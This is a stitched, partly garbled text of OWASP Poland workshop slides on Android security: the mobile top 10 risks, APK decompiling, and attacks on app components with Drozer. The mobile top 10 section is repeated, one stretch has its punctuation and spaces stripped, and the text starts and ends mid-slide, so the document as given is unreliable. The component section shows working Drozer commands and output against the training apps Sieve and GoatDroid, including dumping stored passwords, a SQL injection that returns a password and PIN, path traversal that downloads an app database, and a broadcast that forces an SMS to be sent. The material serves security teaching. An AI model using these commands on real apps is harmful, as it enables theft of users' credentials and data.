• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:

    mallodroid.py -f AppToCheck.apk -d javaout

• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):

    sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:

    dz> run app.provider.finduri <package_name>

• Use logcat to verify what is being logged, using ADB:

    adb logcat [output filter]

• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage – demo
Unintended data leakage – mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:

    dz> run app.activity.start --component <component_name>

• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication – demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication – mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be enforced again on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography – example
• An encrypted db is definitely a good idea…
Broken Cryptography – example
• …but not when you're hardcoding the passwords to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography – mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents

    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections

    dz> run scanner.provider.injection -a <package_name>

• Data path traversal

    dz> run scanner.provider.traversal -a <package_name>

• Intent injections

    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection – mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  – http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling – mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
[Diagram: DEX → JAR → JAVA]
Decompiling – Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed-source Java decompilers
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
[Figure: JD-GUI and Luyten output side by side]
Disassembling
[Diagram: DEX → SMALI]
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:

    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk

• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
Application Framework
• Activity Manager: manages the activity life cycle of applications
• Content Providers: manage the data sharing between applications
• Telephony Manager: manages all voice calls
• Location Manager: location management using GPS or cell towers
• Resource Manager: manages the various types of resources we use in our application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK – how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers
Google Play:
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default, only Google Play and other pre-installed app stores are allowed to install apps.
The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install.
Warn for, or block, Potentially Harmful Applications.
Over 10 million installs verified every day.
Verifying is on and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
• SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
  unrecognized token: ")" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
• Path traversal
  One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Sample manifest from GoatDroid:
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      // the extras come straight from whoever sent the broadcast: no sender check, no validation
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only this user ID, i.e. the current app, will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
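As an added example of the two defenses just listed applied to the GoatDroid receiver (not GoatDroid's code and not from the workshop): the receiver is protected by a custom signature-level permission and validates the extras before touching SmsManager. The package, permission name and action are assumptions; Context.checkSelfPermission needs API 23.

```java
package org.example.hardened;   // hypothetical package, not GoatDroid's

import android.Manifest;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.content.pm.PackageManager;
import android.telephony.PhoneNumberUtils;
import android.telephony.SmsManager;

public class GuardedSmsReceiver extends BroadcastReceiver {
    // Custom permission, declared in our manifest with android:protectionLevel="signature":
    // only packages signed with our certificate can hold it, so only they can send this broadcast.
    static final String SEND_PERMISSION = "org.example.hardened.permission.SEND_SOCIAL_SMS";
    static final String ACTION_SOCIAL_SMS = "org.example.hardened.SOCIAL_SMS";
    static final int MAX_MESSAGE_LEN = 160;

    // Runtime registration with a broadcast permission: the system drops broadcasts from senders
    // that lack it. For a manifest-declared <receiver>, android:permission="..." has the same
    // effect, and android:exported="false" hides the receiver from other apps entirely.
    static void register(Context ctx, GuardedSmsReceiver receiver) {
        ctx.registerReceiver(receiver, new IntentFilter(ACTION_SOCIAL_SMS), SEND_PERMISSION, null);
    }

    @Override
    public void onReceive(Context ctx, Intent intent) {
        // Defence in depth: re-check the action, and that the user still grants us SEND_SMS
        // (Android 6.0 runtime permissions can be revoked after install).
        if (!ACTION_SOCIAL_SMS.equals(intent.getAction())) return;
        if (ctx.checkSelfPermission(Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED) return;
        String number = intent.getStringExtra("phoneNumber");
        String message = intent.getStringExtra("message");
        if (!isAcceptable(number, message)) return;   // malformed extras are dropped, not sent
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    // Validation of the extras that GoatDroid passed straight to sendTextMessage(): both must be
    // present, the number must be a well-formed SMS address and the message bounded in length.
    static boolean isAcceptable(String number, String message) {
        if (number == null || message == null) return false;
        if (message.isEmpty() || message.length() > MAX_MESSAGE_LEN) return false;
        return PhoneNumberUtils.isWellFormedSmsAddress(number);
    }
}
```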
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications.
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or reversible encoding).
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or does so incorrectly.
What do you mean „incorrectly”?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
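The pseudocode above leaves out one thing that the "reality" slide shows apps getting wrong: the pin check has to sit on top of normal chain validation, not replace it. Below is an added example (not the workshop's code) of a trust manager that first lets the platform validate the chain and then compares the SHA-256 of the server's SubjectPublicKeyInfo against a pinned value; the pin string and the openssl recipe in the comment are placeholders/assumptions.

```java
import java.net.URL;
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Collections;
import java.util.Set;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;
import android.util.Base64;

// Pins the hash of the SubjectPublicKeyInfo rather than the whole certificate, so a routine
// certificate renewal with the same key pair does not break the app.
public final class PinnedTrustManager implements X509TrustManager {
    // PLACEHOLDER: base64(SHA-256(SubjectPublicKeyInfo)) of your server key; one way to compute it:
    //   openssl s_client -connect host:443 </dev/null | openssl x509 -pubkey -noout
    //     | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64
    static final String PIN_SHA256_B64 = "REPLACE_WITH_YOUR_PIN";

    private final X509TrustManager systemTrust;  // regular chain-of-trust validation
    private final Set<String> pinnedSpkiHashes;  // base64(SHA-256(SPKI)); ship a backup pin too

    PinnedTrustManager(X509TrustManager systemTrust, Set<String> pins) {
        this.systemTrust = systemTrust;
        this.pinnedSpkiHashes = pins;
    }

    static PinnedTrustManager withSystemTrust(Set<String> pins) throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);   // null = the platform's trusted CA store
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) return new PinnedTrustManager((X509TrustManager) tm, pins);
        }
        throw new IllegalStateException("no X509TrustManager available");
    }

    // Step 1: normal validation is never skipped (skipping it is the "trust all certificates" bug).
    // Step 2: some certificate in the validated chain must carry a pinned key.
    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        systemTrust.checkServerTrusted(chain, authType);
        for (X509Certificate cert : chain) {
            if (pinnedSpkiHashes.contains(spkiHash(cert))) return;   // Start_connection()
        }
        throw new CertificateException("no certificate in chain matches a pinned key");   // Drop_connection()
    }

    static String spkiHash(X509Certificate cert) throws CertificateException {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(cert.getPublicKey().getEncoded());
            return Base64.encodeToString(digest, Base64.NO_WRAP);
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        systemTrust.checkClientTrusted(chain, authType);
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() { return systemTrust.getAcceptedIssuers(); }

    // Hostname verification is left at its default: pinning replaces neither it nor chain validation
    // (the "accept all hostnames" apps in the study got that part wrong).
    static HttpsURLConnection openPinned(URL url) throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { withSystemTrust(Collections.singleton(PIN_SHA256_B64)) }, null);
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        return conn;
    }
}
```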
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
  Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device.
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages.
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication.
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way.
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead.
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side).
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application, Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows for remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem.
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → Java
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Closed-source Java decompiler
